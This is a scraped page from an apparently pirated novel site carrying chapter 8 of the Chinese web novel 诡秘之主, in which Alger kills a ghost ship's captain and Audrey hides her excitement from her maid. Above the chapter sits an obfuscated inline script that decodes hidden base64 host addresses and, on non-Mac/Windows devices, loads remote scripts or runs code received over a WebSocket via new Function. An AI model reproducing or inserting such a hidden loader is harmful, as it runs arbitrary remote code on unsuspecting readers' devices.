笔趣阁

字:
关灯 护眼
笔趣阁 > 诡秘之主 > 第八章 新的时代
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第八章 新的时代

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
呜!
  狂风呼啸,暴雨如注,三桅帆船在一座又一座的波浪“山峰”间起伏,就像被巨人抛飞又接住,接住又抛飞的玩具。
  阿尔杰.威尔逊眼中深红褪去,发现自己依旧站在甲板之上,与先前没有任何区别。
  紧跟着,他看见掌中造型古怪的玻璃瓶喀嚓破碎,霜雪化水,融入了雨滴。
  短短两三秒钟的时间后,这件古代奇物便彻底失去了曾经存在过的痕迹。
  一片六角形的晶莹雪花浮现于阿尔杰的掌心,接着迅速变淡,直至不见,似乎内缩于了血肉。
  阿尔杰像是在思考什么般微不可见地点了点头,沉静了足足五分钟。
  他转过身体,走向船舱入口,刚要进门,就遇见一位同样穿着绣闪电花纹长袍的男子出来。
  这有着柔软黄发的男子顿住脚步,看向阿尔杰,伸出右手,握拳放在胸口道:
  “风暴与你同在。”
  “风暴与你同在。”阿尔杰粗犷深刻的脸庞不带一点多余的情绪,同样地握右拳击左胸。
  彼此行礼后,阿尔杰进入舱房,沿着过道走向远处的船长室。
  一路之上,他竟然没再碰到任何一名水手或船员,这里安静得仿佛坟墓内部。
  船长室大门打开,柔软厚实的深褐色地毯出现于他的眼前,两侧分别是书架和酒柜,一本本封皮偏黄的书籍和一瓶瓶颜色暗红的葡萄酒在蜡烛辉芒照耀下闪烁着异样的光泽。
  摆放蜡烛的书桌上有一瓶墨水,一根羽毛笔,一架黑色的金属望远镜,以及一个黄铜制成的六分仪。
  书桌背后,一个戴着骷髅船长帽、脸色苍白的中年男子看着阿尔杰一步一步过来,愤怒地咬牙说道:
  “我不会屈服的!”
  “我相信你做得到。”阿尔杰平静地就像在说今天天气不太好。
  “你……”中年男子一下怔住,似乎没预料到会是这样的回答。
  就在这时,阿尔杰身体微弓,突然前冲,瞬间将两人的距离拉近到只剩书桌。
  啪!
  他肩膀一紧,右手猛地探出,捏住了中年男子的喉咙。
  没给对方反应的机会,他手背浮现出片片虚幻鱼鳞,五指疯狂用力。
  喀嚓!
  清脆的响声里,中年男子目光大愕,身体被整个提了起来。
  他双脚猛烈地抽动,但又很快恢复了平静,视线茫然之中,瞳孔开始发散,裤裆位置则渐渐湿润,有恶臭传出。
  阿尔杰举起中年男子,伏下腰背,双脚蹬蹬迈开,靠近了旁边的墙壁。
  砰!他将中年男子作为盾牌,狠狠撞向了前方,手臂粗壮如同怪物。
  木制的墙壁应声而碎,狂暴的风雨带着海水的腥潮味道席卷而入。
  阿尔杰扭腰摆背,将中年男子扔出了船舱,扔进了山峰般一座接一座的巨浪里。
  天色黑暗,风雨呼啸,自然的伟力将一切掩埋。
  阿尔杰掏出一张白色的手帕,用心擦了擦右掌,接着将它也丢向了大海。
  退后几步,他耐心等待着同伴入内。
  “怎么了?”不到十秒,刚才那有着柔软黄发的男子就冲了进来。
  “‘船长’逃了。”阿尔杰喘着气,懊恼回答,“他竟然还保留着一些非凡之力!”
  “该死!”黄发男子低声咒骂了一句。
  他来到破口处,凝目望向远方,可除了风雨和海浪,什么都看不见。
  “算了,他只是附带的。”黄发男子挥了下手臂,“能找到这艘图铎时代的幽灵船,我们只会有功劳。”
  哪怕是大海的眷者,这种天气下,他也不敢贸然潜入水中。
  “而且暴风雨如果再持续下去,‘船长’也支撑不了多久。”阿尔杰点了点头,发现木制墙壁上的破口开始以肉眼可见的速度蠕动复原。
  他深深看了一眼,下意识扭头,望向船舵和风帆的位置。
  哪怕隔了重重木板,他也能清楚地知道那里的情况。
  没有大副,没有二副,没有船员,没有水手,甚至没有活人!
  那里空无一物,船舵和风帆在诡异地自行调整。
  脑海内又浮现出那位全身笼罩着灰白雾气的“愚者”,阿尔杰忽然叹了口气。
  他转头望向外面的狂风巨浪,用又期待又畏惧的梦呓口吻道:
  “新的时代开始了……”
  …………
  鲁恩王国首都贝克兰德,皇后区。
  奥黛丽.霍尔捏了捏自己的脸颊,不敢相信刚才的遭遇。
  她面前的梳妆台上,古老的铜镜碎得一块一块。
  目光下移,奥黛丽看见手背处有“深红”流转,如同星辰“纹身”。
  “深红”逐渐黯淡,最终隐于皮肤,消失不见。
  直到这个时候,奥黛丽才确定自己不是在做梦。
  她眸中眼波流动,嘴角一点点上翘,忍不住站了起来,弯腰提上裙摆。
  对着空气行了一礼,奥黛丽脚步轻快,身体转动,跳起了时下宫廷最流行的“古精灵舞”。
  身影翩翩,她脸上尽是灿烂的笑容。
  咚咚咚!卧室的门突然被人敲响。
  “谁?”奥黛丽刷地停止,摆好文雅的姿态。
  “小姐,可以进来吗?您该准备了。”贴身女仆在门外问道。
  奥黛丽侧头看向梳妆台的镜子,飞快将笑容收敛,只留下浅浅一抹。
  她左看右看,确认形象没有任何问题后才温柔开口:
  “进来吧。”
  把手扭动,她的贴身女仆安妮推门而入。
  “噢,它碎了……”安妮一眼就看见了那面古老铜镜的下场。
  奥黛丽眨了眨眼睛,语速缓慢地说道:
  “呃,是,嗯,之前苏茜进来过,你知道的,它总是喜欢破坏!”
  苏茜是一条血统不那么纯正的金毛大狗,是她父亲霍尔伯爵购买猎狐犬时获得的赠品,但非常受奥黛丽喜欢。
  “您得好好教训它。”安妮熟稔地收拾着铜镜碎片,怕伤到了小姐。
  做完这一切,她看向奥黛丽,微笑询问道:
  “想穿哪条裙子?”
  奥黛丽略作思考道:“我喜欢吉尼娅太太为我十七岁生日设计的那条。”
  “不行,别人会说霍尔家族是不是遭遇了财政危机,一条裙子居然在正式场合穿第二回!”安妮摇头否定。
  “但我真地很喜欢它。”奥黛丽语气温和地强调道。
  “您可以在家里穿,在不那么正式的场合穿。”安妮摆出这件事情没有商量的态度。
  “那就赛德斯先生前天送过来的那条,袖口是荷叶边的那条。”奥黛丽隐蔽地吸了口气,保持住优雅甜美的笑容。
  “您的眼光总是这么出色。”安妮笑着退后一步,对门外喊道,“第六号衣帽间,算了,我自己去拿。”
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师